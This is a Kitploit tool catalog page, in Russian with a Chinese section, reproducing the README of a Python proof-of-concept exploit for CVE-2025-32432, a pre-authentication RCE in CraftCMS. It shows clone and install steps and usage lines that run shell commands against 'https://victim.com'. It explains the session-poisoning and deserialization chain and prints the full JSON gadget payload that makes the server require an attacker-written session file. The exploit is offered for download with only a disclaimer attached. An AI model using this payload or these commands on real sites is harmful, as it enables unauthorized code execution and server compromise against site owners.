Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32432-PoC — Python-эксплойт для CVE-2025-32432, RCE без аутентификации в конечной точке asset-transform в CraftCMS. Включает цепочку из двух пакетов для выполнения произвольных команд оболочки через гаджеты десериализации. | Kitploit
Инструменты/GitHubGitHub/cty-research-1/cve-2025-32432-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

Python-эксплойт для CVE-2025-32432, RCE без аутентификации в конечной точке asset-transform в CraftCMS. Включает цепочку из двух пакетов для выполнения произвольных команд оболочки через гаджеты десериализации.

Репозиторий
6411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32432 Exploit Scripts (Python PoC)

Pre-auth Remote Code Execution для CraftCMS 3.x / 4.x / 5.x
Поддерживающий PoC: C.T.Y. (только для исследований)
Обнаружение уязвимости: Nicolas Bourras – Orange Cyberdefense
Дополнительное вдохновение для PoC: Исследования SensePost и публичный скрипт Chirag Artani


1. Обзор

Этот репозиторий содержит два взаимодополняющих эксплойта на Python для CVE-2025-32432 — предварительно аутентифицированного RCE в конечной точке преобразования ресурсов CraftCMS.

СкриптНазначение
craftcms_rce_php_check.pyПроверка безопасности — отправляет один запрос, используя гаджет FnStream, чтобы проверить выполнение произвольного PHP (выводит phpinfo()). Идеально для низкорискового подтверждения.
craftcms_final_payload.pyПолноценный эксплойт — цепочка из двух пакетов: сначала внедряет PHP через FnStream, затем использует гаджет FieldLayoutBehavior → PhpManager для выполнения любой команды оболочки.

Второй скрипт описан в этом README.
Первый скрипт включён для полноты и быстрой проверки, предоставлен Chirag Artani — см. Благодарности.
Имя файла скрипта было адаптировано для ясности; оригинальная структура и идея принадлежат Chirag Artani.


2. Отказ от ответственности 🚨

Только для образовательного и разрешённого тестирования безопасности.
Использование этих скриптов против систем без явного письменного разрешения является незаконным и неэтичным.


3. Возможности (основной эксплойт)

  • Однократное двухпакетное RCE
  • Автоматический подбор assetId (эвристика 404 → 302)
  • Выполнение произвольных команд оболочки (-c/--cmd)
  • Работает через HTTP или HTTPS (предупреждения о проверке SSL подавлены)
  • Чистое извлечение вывода команды из HTML-ответа

4. Требования

  • Python 3.8+
  • Пакеты PyPI (установка через pip install -r requirements.txt):
    • requests
    • urllib3

5. Установка

root@kitploit:~
# Клонируйте репозиторий
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Установите зависимости
pip install -r requirements.txt

6. Использование

6.1 Быстрая проверка выполнения PHP

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://victim.com

Если вы видите вывод phpinfo(), цель, скорее всего, уязвима.

6.2 Полный двухпакетный эксплойт

root@kitploit:~
python3 craftcms_final_payload.py -u https://victim.com -c "id"

Параметры

ПараметрДлинная формаОписаниеОбязательный
-u--urlБазовый URL цели (без завершающего слеша)✅
-c--cmdКоманда оболочки для выполнения✅
-a--assetИзвестный корректный assetId❌
-s--scan-maxЛимит перебора (по умолчанию: 300)❌

7. Как работает уязвимость (кратко)

  • Отравление сессии — GET к /index.php?p=admin/dashboard&a=<?=...?> записывает произвольный PHP в /tmp/sess_<ID>.
  • Гаджет десериализации — POST к actions/assets/generate-transform с гаджетом FieldLayoutBehavior → PhpManager заставляет CraftCMS выполнить require() файла сессии, выполняя код.
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. Протестированные версии

  • CraftCMS < 3.9.15 (требуется подбор assetId)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. Ссылки и дополнительное чтение

  • Оригинальное сообщение — Nicolas Bourras / Orange Cyberdefense
  • Глубокий анализ SensePost
  • PoC Chirag Artani
  • Уведомление безопасности CraftCMS
  • CVE-2025-32432 @ MITRE

10. Благодарности

  • C.T.Y. — Полный двухпакетный PoC и документация
  • Chirag Artani — Оригинальный скрипт проверки phpinfo (craftcms_rce_php_check.py) и ранние исследовательские идеи Имя файла скрипта было адаптировано для ясности; оригинальная структура и идея принадлежат Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Обнаружение уязвимости и ответственное раскрытие
  • Дополнительные идеи от исследовательской группы SensePost

11. Лицензия

Уведомление об ответственности: Любые юридические риски или ущерб, возникшие в результате использования этого кода, полностью лежат на пользователе.

Лицензия MIT — см. LICENSE.


中文說明

1. 專案內容

檔案用途
craftcms_rce_php_check.pyPHP 執行可行性檢查:單一請求,使用 FnStream 觸發 phpinfo(),以低影響方式驗證目標是否易受攻擊。
此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
craftcms_final_payload.py兩包鏈完整利用:先以 FnStream 植入 PHP,再透過 PhpManager 執行任意指令。

2. 免責聲明

僅供教學與合法授權測試使用。未經授權操作即屬違法。


3. 快速檢查

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://目標站

4. 完整利用

root@kitploit:~
python3 craftcms_final_payload.py -u https://目標站 -c "id"

參數與英文版相同。


5. 致謝

  • Chirag Artani — phpinfo 檢查腳本 此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
  • Nicolas Bourras / Orange Cyberdefense — 漏洞發現與技術靈感
  • SensePost — 技術靈感

6. 授權

使用本程式碼造成之任何法律風險與損失,由使用者自行承擔。

MIT License

Скачать инструмент